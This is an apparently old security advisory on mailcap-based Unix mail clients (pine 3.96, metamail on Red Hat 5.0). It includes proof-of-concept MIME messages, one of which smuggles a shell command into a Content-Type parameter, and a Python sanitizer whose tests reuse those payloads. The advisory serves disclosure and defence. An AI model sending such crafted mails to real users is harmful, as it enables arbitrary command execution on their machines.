COMMAND

    mailcap

SYSTEMS AFFECTED

    Linux RedHat 5.0 (others?)

PROBLEM

    Michal Zalewski found the following.  Many mailcap-compatible Unix
    mail clients have several security holes.  The mailcap mechanism is
    usually so poorly implemented that a wide range of attacks is
    possible - from 'harmless' messing with the screen, through
    executing specific commands with arbitrary parameters, up to
    executing *arbitrary* commands via an e-mail message.  Here are two
    examples, both tested under the Linux RH 5.0 distribution (mailcap
    1.0.6, pine 3.96).

    Example 1 (light) - pine 3.96 confusion
    =======================================
    The following example demonstrates how to cause a few 'mostly
    harmless' errors due to the improper expansion of the ` character
    by pine - it's just annoying, because you can't view this mail
    properly:

    MIME-Version: 1.0
    Content-Type: multipart/alternative;
            boundary="----=_NextPart_000_0007_01BD5F09.B6797740"

    ------=_NextPart_000_0007_01BD5F09.B6797740
    Content-Type: text/plain;
            charset="crashme`"
    Content-Transfer-Encoding: quoted-printable

    Hellow!

    ------=_NextPart_000_0007_01BD5F09.B6797740--

    Example 2 (heavy) - execution of arbitrary code
    ===============================================
    This one is more dangerous - the following MIME mail, when viewed,
    executes 'touch /tmp/BIG_HOLE' (the bug lies in the metamail
    script):

    MIME-Version: 1.0
    Content-Type: multipart/alternative;
            boundary="----=_NextPart_000_0007_01BD5F09.B6797740"

    ------=_NextPart_000_0007_01BD5F09.B6797740
    Content-Type: default;
            encoding="\\\"x\\\"\ ==\ \\\"x\\\"\ \)\ touch\ \/tmp/BIG_HOLE"
    Content-Transfer-Encoding: quoted-printable

    Hellow!!!

    ------=_NextPart_000_0007_01BD5F09.B6797740--

SOLUTION

    Perhaps a newer release of mailcap will get this right.
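
    Both examples work because a Content-Type parameter value reaches a
    shell command line unchecked.  The sketch below is an added example,
    not code from mailcap, metamail or pine: it rejects any parameter
    value outside a conservative allow-list before expanding a
    mailcap-style %{name} template, and shell-quotes what remains.  The
    allow-list, the function names and the "viewer" handler are
    assumptions made for illustration.

```python
import re
import shlex
from email import message_from_string
from email.utils import collapse_rfc2231_value

# Allow-list for values that may reach a handler command line (assumption:
# real charset/encoding names need only these characters).
SAFE_PARAM = re.compile(r"[A-Za-z0-9][A-Za-z0-9._+-]{0,63}")

def unsafe_params(part):
    """Return {name: value} for Content-Type parameters failing the allow-list."""
    bad = {}
    for name, value in part.get_params(failobj=[])[1:]:  # [0] is the type itself
        if name.lower() == "boundary":
            continue  # used by the MIME parser only, never given to a handler
        value = collapse_rfc2231_value(value)
        if not SAFE_PARAM.fullmatch(value):
            bad[name.lower()] = value
    return bad

def expand(template, part):
    """Expand %{name} in a mailcap-style template; refuse unsafe messages."""
    bad = unsafe_params(part)
    if bad:
        raise ValueError(f"unsafe MIME parameters, not expanding: {sorted(bad)}")
    fill = lambda m: shlex.quote(str(part.get_param(m.group(1), "")))
    return re.sub(r"%\{([A-Za-z0-9-]+)\}", fill, template)

# Constructed test messages: one benign part, plus parts carrying the two
# parameter values shown in Examples 1 and 2 above.
GOOD = message_from_string('Content-Type: text/plain; charset="iso-8859-1"\n\nhi\n')
EX1 = message_from_string('Content-Type: text/plain; charset="crashme`"\n\nhi\n')
EX2 = message_from_string(
    r'Content-Type: default; encoding="\\\"x\\\"\ ==\ \\\"x\\\"\ \)\ touch\ \/tmp/BIG_HOLE"'
    "\n\nhi\n")

TEMPLATE = "viewer --charset %{charset}"  # hypothetical handler entry

if __name__ == "__main__":
    print(expand(TEMPLATE, GOOD))
    for label, msg in (("example 1", EX1), ("example 2", EX2)):
        print(label, "rejected:", sorted(unsafe_params(msg)))
```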